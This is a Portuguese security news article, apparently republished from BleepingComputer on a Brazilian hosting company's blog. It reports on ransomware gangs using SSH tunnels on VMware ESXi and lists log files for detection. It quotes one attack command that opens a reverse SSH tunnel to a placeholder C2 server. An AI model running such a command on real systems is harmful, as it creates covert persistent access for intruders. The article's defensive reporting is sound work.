Gangue de ransomware usa túneis SSH para acesso furtivo ao VMware ESXi

Sticky 26/01/2025
ransomware
Visualizações: 3

Atores de ransomware que visam os hipervisores bare metal ESXi estão aproveitando o tunelamento SSH para persistir no sistema, permanecendo sem serem detectados.

Os appliances VMware ESXi têm um papel crítico em ambientes virtualizados, pois podem ser executados em um único servidor físico e em várias máquinas virtuais de uma organização.

Eles são em grande parte não monitorados e foram um alvo para hackers procurando acessar redes corporativas onde eles podem roubar dados e criptografar arquivos, prejudicando assim todo um negócio, tornando todas as máquinas virtuais inacessíveis.

A empresa de segurança cibernética Sygnia relata que, em muitos casos, o compromisso é alcançado explorando falhas conhecidas ou usando credenciais de administrador comprometidas.

SSHing no hipervisor

O ESXi possui um serviço SSH integrado que permite aos administradores gerenciar remotamente o hipervisor por meio de um shell.

Sygnia diz que os agentes de ransomware abusam desse recurso para estabelecer persistência, mover-se lateralmente e implantar cargas úteis de ransomware. Como muitas organizações não monitoram ativamente a atividade do ESXi SSH, os invasores podem usá-lo furtivamente.

“Uma vez que [os hackers estão] no dispositivo, configurar o tunelamento é uma tarefa simples usando a funcionalidade SSH nativa ou implantando outras ferramentas comuns com recursos semelhantes,” explica Sygnia.

“Por exemplo, ao utilizar o binário SSH, um encaminhamento de porta remoto para o servidor C2 pode ser facilmente configurado utilizando o seguinte comando: ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>”

“Uma vez que os dispositivos ESXi são resilientes e raramente desligam inesperadamente, este tunelamento serve como um backdoor semi-persistente dentro da rede.”

Captura de tela 2025 01 26 175053

Lacunas no registro

A Sygnia também destaca os desafios no monitoramento dos logs do ESXi, que levam a lacunas significativas de visibilidade que os agentes de ransomware sabem como aproveitar.

Ao contrário da maioria dos sistemas em que os logs são consolidados em um único arquivo syslog, o ESXi distribui logs em vários arquivos de log dedicados, portanto, encontrar evidências requer reunir informações de várias fontes.

A empresa de segurança sugere que os administradores do sistema analisem esses quatro arquivos de log para detectar o tunelamento SSH e a atividade de ransomware:

  • /var/log/shell.log → Rastreia a execução de comandos no ESXi Shell
  • /var/log/hostd.log → Regista atividades administrativas e autenticação de utilizadores
  • /var/log/auth.log → Captura tentativas de login e eventos de autenticação
  • /var/log/vobd.log → Armazena registos de eventos de sistema e segurança

É provável que o hostd.log e o vodb.log também contenham traços de modificação de regras de firewall, o que é essencial para permitir o acesso SSH persistente.

Deve-se notar que os agentes de ransomware geralmente limpam logs para apagar evidências de acesso SSH, modificar registros de data e hora ou truncar logs para confundir os investigadores, portanto, encontrar evidências é sempre simples.

Por fim, recomenda-se que as organizações centralizem os logs do ESXi por meio do encaminhamento do syslog e integrem os logs em um sistema de Gerenciamento de Informações e Eventos de Segurança (SIEM) para detectar anomalias.

Fonte: bleepingcomputer.com

A Host Curitiba é uma empresa fundada em Fevereiro de 2004 iniciando suas atividades em rede em 31/07/2008 e especializada em segurança Web e Servidores Empresariais.

DataCenter:
Av. São Paulo, 1223. João Pessoa, Paraíba - Brasil CEP: 58.030-040
Registro CNPJ: 09.452.853/0001-39

Provedor?
Rua: Clávio Molinari, 1298 Capão da Imbuia - Curitiba Paraná CE: 82810210
Registro: 20.962.496/0001-91

Central de Atendimento ao Cliente:
Atendimento (41) 9 9555-8123
Suporte técnico (11) 9 3333-6326

https://www.hostcuritiba.com.br | https://www.hostcuritiba.net.br
contato@hostcuritiba.net.br - suporte@hostcuritiba.net.br - abuse@hostcuritiba.net.br

Outros artigos

ranwomware

Novo ‘Helldown’ Ransomware expande ataques para sistemas VMware e Linux

Sticky 19/11/2024

Os pesquisadores de segurança cibernética lançaram luz sobre uma variante do Linux de uma cepa de ransomware relativamente nova chamada Helldown, sugerindo que os agentes de ameaças estão ampliando seu foco de ataque. “Helldown implanta Windows ransomware derivado do código LockBit 3.0,” Sekoia disse em um relatório compartilhado com o The Hacker News. “Dado o recente desenvolvimento […]

OpenSSH

Vulnerabilidade crítica de execução remota por Código (RCE)

Sticky 14/10/2024

Em 1o de julho de 2024, a comunidade de segurança cibernética foi abalada pela descoberta de uma vulnerabilidade crítica de Execução Remota de Código (RCE) no OpenSSH, apropriadamente chamada de regreSSHion. Essa revelação desencadeou um frenesi entre as equipes de segurança que se esforçaram para localizar e proteger seus servidores SSH, enquanto os fornecedores de […]

Ransomware

Microsoft identifica Storm-0501 como grande ameaça em ataques de ransomware em nuvem híbrida.

Sticky 27/09/2024

O agente de ameaças conhecido como Storm-0501 tem como alvo os setores governamental, de manufatura, de transporte e de segurança pública nos EUA para realizar ataques de ransomware. A campanha de ataque em vários estágios foi projetada para comprometer ambientes de nuvem híbrida e realizar movimentos laterais do ambiente local para o ambiente de nuvem, […]